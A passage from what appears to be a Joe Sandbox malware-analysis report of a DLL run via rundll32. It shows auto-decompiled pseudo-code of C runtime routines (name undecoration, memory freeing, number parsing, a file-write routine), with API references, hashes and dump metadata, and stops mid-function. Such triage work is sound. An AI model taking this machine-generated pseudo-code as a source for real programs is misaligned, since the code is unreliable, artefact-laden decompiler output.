								E100076A6(E1000723E( &_v48,  &_v32),  &_v32,  &_v40);
								_push(0x27);
								L35:
								_push(_t164);
								E100076C8( &_v32);
								goto L53;
							}
							_t84 = _t78;
							__eflags = _t84;
							if(_t84 == 0) {
								goto L50;
							}
							_t85 = _t84 - 1;
							__eflags = _t85;
							if(_t85 == 0) {
								_v32 = "`generic-class-parameter-";
								goto L49;
							}
							__eflags = _t85 != 1;
							if(_t85 != 1) {
								goto L51;
							}
							_v32 = "`generic-method-parameter-";
							_v28 = 0x1a;
							goto L47;
						}
						_t126 =  *0x1004e014; // 0x0
						__eflags = _t126;
						if(_t126 == 0) {
							goto L42;
						}
						 *0x1004223c(_t72 & 0x00000fff);
						_t89 =  *_t126();
						__eflags = _t89;
						if(_t89 == 0) {
							goto L42;
						}
						_v36 = 0;
						_push(_v36);
						E10006E34(_t164, _t89);
						goto L53;
					}
					if(__eflags == 0) {
						goto L38;
					}
					__eflags = _t124 - 0x4a;
					if(_t124 <= 0x4a) {
						_v32 = _v32 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						E10008798( &_v32, 0x7b);
						_t127 = _t124 - 0x48;
						__eflags = _t124 - 0x48 - 2;
						if(__eflags <= 0) {
							_push( &_v40);
							E100077A0( &_v32, L10009B9E(_t127,  &_v32, __edx, _t164, _t165, __eflags));
							E100077F7( &_v32, 0x2c);
						}
						_t168 = _t165 - 0x46;
						__eflags = _t168;
						if(_t168 == 0) {
							L32:
							E100077A0( &_v32, E1000BC98(_t163,  &_v40));
							E100077F7( &_v32, 0x2c);
							goto L33;
						} else {
							_t169 = _t168 - 1;
							__eflags = _t169;
							if(_t169 == 0) {
								L31:
								E100077A0( &_v32, E1000BC98(_t163,  &_v40));
								E100077F7( &_v32, 0x2c);
								goto L32;
							}
							_t170 = _t169 - 1;
							__eflags = _t170;
							if(_t170 == 0) {
								L33:
								E100077A0( &_v32, E1000BC98(_t163,  &_v40));
								L34:
								_push(0x7d);
								goto L35;
							}
							_t171 = _t170 - 1;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L32;
							}
							__eflags = _t171 != 1;
							if(_t171 != 1) {
								goto L34;
							}
							goto L31;
						}
					}
					__eflags = _t124 - 0x4d;
					if(_t124 != 0x4d) {
						goto L51;
					}
					E1000C5F3(_t124, __edx, _t165,  &_v32);
					E1000C2ED(__edx, _t164);
					L9:
					L10:
					goto L53;
				}
				if(_t176 == 0) {
					_push(_t164);
					L10009B9E(_t124, _t129, __edx, _t164, _t165, __eflags);
					goto L10;
				}
				if(_t124 == 0) {
					 *0x1004e004 = _t64 - 1;
					E100072DE(_t164, 1);
					goto L53;
				}
				if(_t124 == 0x30) {
					E1000BC98(__edx, _t164);
					goto L10;
				}
				if(_t124 == 0x31) {
					__eflags =  *_t64 - 0x40;
					if( *_t64 != 0x40) {
						_v32 = _v32 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						E10008798( &_v32, 0x26);
						_push( &_v40);
						E100076A6( &_v32, _t164, L10009B9E(_t124,  &_v32, __edx, _t164, _t165, __eflags));
					} else {
						_v32 = "NULL";
						 *0x1004e004 = _t64 + 1;
						_v28 = 4;
						E1000723E(_t164,  &_v32);
					}
					goto L53;
				}
				if(_t124 == 0x32) {
					E1000CC65(_t124, __edx, _t165, _t164);
					goto L10;
				}
				if(_t124 == 0x34) {
					E1000BF31(_t164);
					goto L10;
				}
				if(_t124 - 0x41 > 1) {
					goto L51;
				}
				E1000A460(__edx, _t164, _t165);
				goto L9;
			}

APIs

DName::operator+.LIBCMT ref: 1000C3B9
UnDecorator::getSignedDimension.LIBCMT ref: 1000C3C4
DName::DName.LIBVCRUNTIME ref: 1000C3D5
UnDecorator::getSignedDimension.LIBCMT ref: 1000C46F
UnDecorator::getSignedDimension.LIBCMT ref: 1000C48C
UnDecorator::getSignedDimension.LIBCMT ref: 1000C4A9
DName::operator+.LIBCMT ref: 1000C4BE
UnDecorator::getSignedDimension.LIBCMT ref: 1000C4E1
swprintf.LIBCMT ref: 1000C552
DName::operator+.LIBCMT ref: 1000C5A9

Part of subcall function 1000A460: DName::DName.LIBVCRUNTIME ref: 1000A484

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
String ID:
API String ID: 3689813335-0
Opcode ID: 3870ca652ee5dd46192f954932dcdd9a1671f71589c666b9744f5de558d7014f
Instruction ID: f9c83e7f69799ed626e93f8569c8994f1034e48759f8977a8353ac719b3bb837
Opcode Fuzzy Hash: 3870ca652ee5dd46192f954932dcdd9a1671f71589c666b9744f5de558d7014f
Instruction Fuzzy Hash: 62819376D1070D9AFB14CBA0CD96FFE77B8EB053C1F60401AE506A2089DB78BA44C795

Uniqueness

Uniqueness Score: -1.00%

Function 10023CFC, Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E10023CFC(void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;

				_t71 = __esi;
				_t36 = _a4;
				_t67 =  *_a4;
				_t75 = _t67 - 0x100439f8;
				if(_t67 != 0x100439f8) {
					E100268B3(_t67);
					_t36 = _a4;
				}
				E100268B3( *((intOrPtr*)(_t36 + 0x3c)));
				E100268B3( *((intOrPtr*)(_a4 + 0x30)));
				E100268B3( *((intOrPtr*)(_a4 + 0x34)));
				E100268B3( *((intOrPtr*)(_a4 + 0x38)));
				E100268B3( *((intOrPtr*)(_a4 + 0x28)));
				E100268B3( *((intOrPtr*)(_a4 + 0x2c)));
				E100268B3( *((intOrPtr*)(_a4 + 0x40)));
				E100268B3( *((intOrPtr*)(_a4 + 0x44)));
				E100268B3( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E100238C6(_t75);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E10023931(_t71, _t75);
			}

APIs

_free.LIBCMT ref: 10023D12

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 10023D1E
_free.LIBCMT ref: 10023D29
_free.LIBCMT ref: 10023D34
_free.LIBCMT ref: 10023D3F
_free.LIBCMT ref: 10023D4A
_free.LIBCMT ref: 10023D55
_free.LIBCMT ref: 10023D60
_free.LIBCMT ref: 10023D6B
_free.LIBCMT ref: 10023D79

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 46643b81a24f0458ed114faaef335da02fc76548a0a77645ebc19370622f552b
Instruction ID: 02d10424f483025c11247d9988229feb7d6f071447483585f46ce33aa515a283
Opcode Fuzzy Hash: 46643b81a24f0458ed114faaef335da02fc76548a0a77645ebc19370622f552b
Instruction Fuzzy Hash: 0A21947AD04108AFDB41DFA4D981DDE7BB9EF08244F4086A6F515DB222DB71EA448FC0

Uniqueness

Uniqueness Score: -1.00%

Function 1000EFDF, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E1000EFDF(intOrPtr _a4, signed int _a8, intOrPtr* _a12, signed int _a16, signed char _a20) {
				signed int _v8;
				signed int _v12;
				signed short* _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed short* _v156;
				signed short* _v160;
				signed int _v164;
				intOrPtr _v168;
				signed short* _v172;
				char _v176;
				char _v188;
				signed short* _t176;
				signed int _t177;
				signed int _t178;
				signed short* _t179;
				signed int _t180;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				intOrPtr _t186;
				void* _t187;
				signed char _t189;
				signed int _t193;
				signed int _t194;
				signed int _t196;
				void* _t199;
				intOrPtr _t200;
				signed int _t208;
				signed int _t209;
				signed short* _t211;
				signed int _t212;
				signed int _t214;
				intOrPtr _t219;
				void* _t220;
				signed short* _t221;
				signed int _t222;
				signed short* _t223;
				intOrPtr _t224;
				void* _t228;
				signed short* _t230;
				signed int _t232;
				signed short* _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed short* _t240;
				intOrPtr* _t244;
				signed short _t245;

				if(E1000FB5A( &_a8) == 0) {
					L5:
					_t235 = 0;
					_t208 = 0;
					L6:
					_t244 = _a12;
					if(_t244 != 0) {
						 *_t244 = _a8;
					}
					return _t235;
				}
				_t209 = _a16;
				_t236 = 2;
				if(_t209 == 0) {
					L9:
					_t217 =  &_v188;
					E1000F794( &_v188, _t228, _a4);
					_v12 = 0;
					_v20 = 0;
					_t176 = _a8;
					_v172 = _t176;
					_t245 =  *_t176 & 0x0000ffff;
					_t177 =  &(_t176[1]);
					L11:
					_a8 = _t177;
					_t178 = E100242A0(_t217, _t245, 8);
					_pop(_t217);
					__eflags = _t178;
					if(_t178 != 0) {
						_t179 = _a8;
						_t245 =  *_t179 & 0x0000ffff;
						_t177 = _t179 + _t236;
						__eflags = _t177;
						goto L11;
					}
					_t180 = _a20 & 0x000000ff;
					_v8 = _t180;
					__eflags = _t245 - 0x2d;
					if(_t245 != 0x2d) {
						__eflags = _t245 - 0x2b;
						if(_t245 != 0x2b) {
							_t230 = _a8;
							goto L17;
						}
						goto L15;
					} else {
						_v8 = _t180 | _t236;
						L15:
						_t234 = _a8;
						_t245 =  *_t234 & 0x0000ffff;
						_t230 = _t234 + _t236;
						_a8 = _t230;
						L17:
						_v16 = 0x3a;
						_t219 = 0xff10;
						_v148 = 0x66a;
						_v24 = 0x6f0;
						_v28 = 0x6fa;
						_v32 = 0x966;
						_v36 = 0x970;
						_v40 = 0x9e6;
						_v44 = 0x9f0;
						_v48 = 0xa66;
						_v52 = 0xa70;
						_v56 = 0xae6;
						_v60 = 0xaf0;
						_v64 = 0xb66;
						_v68 = 0xb70;
						_v72 = 0xc66;
						_v76 = 0xc70;
						_v80 = 0xce6;
						_v84 = 0xcf0;
						_v88 = 0xd66;
						_v92 = 0xd70;
						_v96 = 0xe50;
						_v100 = 0xe5a;
						_v104 = 0xed0;
						_v108 = 0xeda;
						_v112 = 0xf20;
						_v116 = 0xf2a;
						_v120 = 0x1040;
						_v124 = 0x104a;
						_v128 = 0x17e0;
						_v132 = 0x17ea;
						_v136 = 0x1810;
						_v140 = 0x181a;
						_v144 = 0xff1a;
						_t237 = 0x30;
						__eflags = _t209;
						if(_t209 == 0) {
							L19:
							__eflags = _t245 - _t237;
							if(_t245 < _t237) {
								L61:
								_t182 = _t245 & 0x0000ffff;
								__eflags = _t182 - 0x41;
								if(_t182 < 0x41) {
									L64:
									_t86 = _t182 - 0x61; // 0x5ff
									_t220 = _t86;
									__eflags = _t220 - 0x19;
									if(_t220 > 0x19) {
										_t183 = _t182 | 0xffffffff;
										__eflags = _t183;
										L69:
										__eflags = _t183;
										if(_t183 == 0) {
											_t184 =  *_t230 & 0x0000ffff;
											_t221 =  &(_t230[1]);
											_a8 = _t221;
											__eflags = _t184 - 0x78;
											if(_t184 == 0x78) {
												L77:
												__eflags = _t209;
												if(_t209 == 0) {
													_t209 = 0x10;
													_a16 = _t209;
												}
												_t245 =  *_t221 & 0x0000ffff;
												_t222 =  &(_t221[1]);
												__eflags = _t222;
												_a8 = _t222;
												L80:
												_t185 = _t209;
												asm("cdq");
												_push(_t209);
												_t223 = _t230;
												_v164 = _t209;
												_v160 = _t223;
												_t186 = E1003F7B0(0xffffffff, 0xffffffff, _t185, _t223);
												_v152 = _t209;
												_v156 = _t223;
												_t211 = _t230;
												_t224 = _t186;
												_v16 = _t211;
												_v168 = _t224;
												while(1) {
													__eflags = _t245 - _t237;
													if(_t245 < _t237) {
														goto L122;
													}
													_t199 = 0x3a;
													__eflags = _t245 - _t199;
													if(_t245 >= _t199) {
														_t200 = 0xff10;
														__eflags = _t245 - 0xff10;
														if(_t245 >= 0xff10) {
															__eflags = _t245 - _v144;
															if(_t245 < _v144) {
																L87:
																_t239 = (_t245 & 0x0000ffff) - _t200;
																L121:
																__eflags = _t239 - 0xffffffff;
																if(_t239 != 0xffffffff) {
																	L130:
																	__eflags = _t239 - 0xffffffff;
																	if(_t239 == 0xffffffff) {
																		L144:
																		E1000FB11( &_a8, _t245);
																		_t189 = _v8;
																		__eflags = _t189 & 0x00000008;
																		if((_t189 & 0x00000008) != 0) {
																			_t208 = _v20;
																			_t235 = _v12;
																			__eflags = E1000E497(_t189, _t235, _t208);
																			if(__eflags == 0) {
																				__eflags = _v8 & 0x00000002;
																				if((_v8 & 0x00000002) != 0) {
																					_t235 =  ~_t235;
																					asm("adc ebx, 0x0");
																					_t208 =  ~_t208;
																				}
																				L155:
																				__eflags = _v176;
																				if(_v176 != 0) {
																					 *(_v188 + 0x350) =  *(_v188 + 0x350) & 0xfffffffd;
																				}
																				goto L6;
																			}
																			 *((intOrPtr*)(E1002449E(__eflags))) = 0x22;
																			_t193 = _v8;
																			__eflags = _t193 & 0x00000001;
																			if((_t193 & 0x00000001) != 0) {
																				__eflags = _t193 & 0x00000002;
																				if((_t193 & 0x00000002) == 0) {
																					_t194 = _t193 | 0xffffffff;
																					__eflags = _t194;
																					_t208 = 0x7fffffff;
																				} else {
																					_t194 = 0;
																					_t208 = 0x80000000;
																				}
																				L152:
																				_t235 = _t194;
																				goto L155;
																			}
																			_t235 = _t235 | 0xffffffff;
																			_t208 = _t208 | 0xffffffff;
																			goto L155;
																		}
																		_a8 = _v172;
																		_t194 = 0;
																		_t208 = 0;
																		goto L152;
																	}
																	__eflags = _t239 - _a16;
																	if(_t239 >= _a16) {
																		goto L144;
																	}
																	_t196 = _v20;
																	_t232 = _v8 | 0x00000008;
																	__eflags = _t196 - _t211;
																	_v8 = _t232;
																	_t212 = _v12;
																	if(__eflags < 0) {
																		L141:
																		__eflags = 0;
																		L142:
																		_t214 = E1003F850(_v164, _v160, _t212, _t196) + _t239;
																		__eflags = _t214;
																		_v12 = _t214;
																		asm("adc eax, esi");
																		_v20 = _t232;
																		L143:
																		_t240 = _a8;
																		_t224 = _v168;
																		_t211 = _v16;
																		_t245 =  *_t240 & 0x0000ffff;
																		_a8 =  &(_t240[1]);
																		_t237 = 0x30;
																		continue;
																	}
																	if(__eflags > 0) {
																		L135:
																		__eflags = _t212 - _t224;
																		if(_t212 != _t224) {
																			L140:
																			_v8 = _t232 | 0x00000004;
																			goto L143;
																		}
																		__eflags = _t196 - _v16;
																		if(_t196 != _v16) {
																			goto L140;
																		}
																		__eflags = 0 - _v152;
																		if(__eflags < 0) {
																			goto L142;
																		}
																		if(__eflags > 0) {
																			goto L140;
																		}
																		__eflags = _t239 - _v156;
																		if(_t239 <= _v156) {
																			goto L142;
																		}
																		goto L140;
																	}
																	__eflags = _t212 - _t224;
																	if(_t212 < _t224) {
																		goto L141;
																	}
																	goto L135;
																}
																goto L122;
															}
															_t239 = _t237 | 0xffffffff;
															__eflags = _t239;
															goto L121;
														}
														_t200 = 0x660;
														__eflags = _t245 - 0x660;
														if(_t245 < 0x660) {
															goto L122;
														}
														__eflags = _t245 - _v148;
														if(_t245 >= _v148) {
															_t200 = _v24;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v28;
															if(_t245 < _v28) {
																goto L87;
															}
															_t200 = _v32;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v36;
															if(_t245 < _v36) {
																goto L87;
															}
															_t200 = _v40;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v44;
															if(_t245 < _v44) {
																goto L87;
															}
															_t200 = _v48;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v52;
															if(_t245 < _v52) {
																goto L87;
															}
															_t200 = _v56;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v60;
															if(_t245 < _v60) {
																goto L87;
															}
															_t200 = _v64;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v68;
															if(_t245 < _v68) {
																goto L87;
															}
															_t200 = _v72;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v76;
															if(_t245 < _v76) {
																goto L87;
															}
															_t200 = _v80;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v84;
															if(_t245 < _v84) {
																goto L87;
															}
															_t200 = _v88;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v92;
															if(_t245 < _v92) {
																goto L87;
															}
															_t200 = _v96;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v100;
															if(_t245 < _v100) {
																goto L87;
															}
															_t200 = _v104;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v108;
															if(_t245 < _v108) {
																goto L87;
															}
															_t200 = _v112;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v116;
															if(_t245 < _v116) {
																goto L87;
															}
															_t200 = _v120;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v124;
															if(_t245 < _v124) {
																goto L87;
															}
															_t200 = _v128;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v132;
															if(_t245 < _v132) {
																goto L87;
															}
															_t200 = _v136;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v140;
															if(_t245 >= _v140) {
																goto L122;
															}
														}
														goto L87;
													}
													_t239 = (_t245 & 0x0000ffff) - 0x30;
													goto L121;
													L122:
													_t238 = _t245 & 0x0000ffff;
													__eflags = _t238 - 0x41;
													if(_t238 < 0x41) {
														L125:
														_t133 = _t238 - 0x61; // -49
														_t187 = _t133;
														__eflags = _t187 - 0x19;
														if(_t187 > 0x19) {
															_t239 = _t238 | 0xffffffff;
															__eflags = _t239;
															goto L130;
														}
														L126:
														__eflags = _t187 - 0x19;
														if(_t187 <= 0x19) {
															_t238 = _t238 + 0xffffffe0;
															__eflags = _t238;
														}
														_t239 = _t238 + 0xffffffc9;
														goto L130;
													}
													__eflags = _t238 - 0x5a;
													if(_t238 > 0x5a) {
														goto L125;
													}
													_t132 = _t238 - 0x61; // -49
													_t187 = _t132;
													goto L126;
												}
											}
											__eflags = _t184 - 0x58;
											if(_t184 == 0x58) {
												goto L77;
											}
											__eflags = _t209;
											if(_t209 == 0) {
												_t209 = 8;
												_a16 = _t209;
											}
											E1000FB11( &_a8, _t184);
											goto L80;
										}
										__eflags = _t209;
										if(_t209 == 0) {
											_t209 = 0xa;
											_a16 = _t209;
										}
										goto L80;
									}
									L65:
									__eflags = _t220 - 0x19;
									if(_t220 <= 0x19) {
										_t182 = _t182 + 0xffffffe0;
										__eflags = _t182;
									}
									_t183 = _t182 + 0xffffffc9;
									goto L69;
								}
								__eflags = _t182 - 0x5a;
								if(_t182 > 0x5a) {
									goto L64;
								}
								_t85 = _t182 - 0x61; // 0x5ff
								_t220 = _t85;
								goto L65;
							}
							__eflags = _t245 - _v16;
							if(_t245 >= _v16) {
								__eflags = _t245 - _t219;
								if(_t245 >= _t219) {
									__eflags = _t245 - _v144;
									if(_t245 < _v144) {
										L28:
										_t183 = (_t245 & 0x0000ffff) - _t219;
										L60:
										__eflags = _t183 - 0xffffffff;
										if(_t183 != 0xffffffff) {
											goto L69;
										}
										goto L61;
									}
									_t183 = 0xffffffffffffffff;
									__eflags = 0xffffffffffffffff;
									goto L60;
								}
								__eflags = _t245 - 0x660;
								if(_t245 < 0x660) {
									goto L61;
								}
								__eflags = _t245 - _v148;
								if(_t245 >= _v148) {
									_t219 = _v24;
									__eflags = _t245 - _t219;
									if(_t245 < _t219) {
										goto L61;
									}
									__eflags = _t245 - _v28;
									if(_t245 >= _v28) {
										_t219 = _v32;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v36;
										if(_t245 < _v36) {
											goto L28;
										}
										_t219 = _v40;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v44;
										if(_t245 < _v44) {
											goto L28;
										}
										_t219 = _v48;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v52;
										if(_t245 < _v52) {
											goto L28;
										}
										_t219 = _v56;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v60;
										if(_t245 < _v60) {
											goto L28;
										}
										_t219 = _v64;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v68;
										if(_t245 < _v68) {
											goto L28;
										}
										_t219 = _v72;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v76;
										if(_t245 < _v76) {
											goto L28;
										}
										_t219 = _v80;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v84;
										if(_t245 < _v84) {
											goto L28;
										}
										_t219 = _v88;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v92;
										if(_t245 < _v92) {
											goto L28;
										}
										_t219 = _v96;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v100;
										if(_t245 < _v100) {
											goto L28;
										}
										_t219 = _v104;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v108;
										if(_t245 < _v108) {
											goto L28;
										}
										_t219 = _v112;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v116;
										if(_t245 < _v116) {
											goto L28;
										}
										_t219 = _v120;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v124;
										if(_t245 < _v124) {
											goto L28;
										}
										_t219 = _v128;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v132;
										if(_t245 < _v132) {
											goto L28;
										}
										_t219 = _v136;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v140;
										if(_t245 >= _v140) {
											goto L61;
										}
									}
									goto L28;
								}
								_t183 = (_t245 & 0x0000ffff) - 0x660;
								goto L60;
							}
							_t183 = (_t245 & 0x0000ffff) - _t237;
							goto L60;
						}
						__eflags = _t209 - 0x10;
						if(_t209 != 0x10) {
							goto L80;
						}
						goto L19;
					}
				}
				if(_t209 < _t236) {
					L4:
					 *((intOrPtr*)(E1002449E(_t253))) = 0x16;
					E1000E314();
					goto L5;
				}
				_t253 = _t209 - 0x24;
				if(_t209 <= 0x24) {
					goto L9;
				}
				goto L4;
			}

APIs

__aulldvrm.LIBCMT ref: 1000F3BC

Strings

f, xrefs: 1000F0CA
p, xrefs: 1000F133
f, xrefs: 1000F0E6
:, xrefs: 1000F0A1
p, xrefs: 1000F0D1
p, xrefs: 1000F0ED
f, xrefs: 1000F12C

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: __aulldvrm
String ID: :$f$f$f$p$p$p
API String ID: 1302938615-1434680307
Opcode ID: 350fe8e4ff33367bb6dfe719a0ccd67005cbf78c354b2737ca42fbadf5c2dbbf
Instruction ID: e40459f71609af27f955baf17b6dca83de0bb25eb23cd22cff97dc1eb6c4fdf7
Opcode Fuzzy Hash: 350fe8e4ff33367bb6dfe719a0ccd67005cbf78c354b2737ca42fbadf5c2dbbf
Instruction Fuzzy Hash: EF028475E00259CAFF60CFA4D8486FDB7B2FB40B94FA1811DD424BB689D7705E84AB11

Uniqueness

Uniqueness Score: -1.00%

Function 10039C35, Relevance: 13.8, APIs: 9, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E10039C35(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E1002448B(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E1002449E( *_t137))) = 9;
						L60:
						_t139 = E1000E314();
						goto L61;
					}
					__eflags = _t198 -  *0x1004e828; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x1004e628 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E1002448B(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
								E1000E314();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E10024214(_t154);
								E100268B3(0);
								E100268B3(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
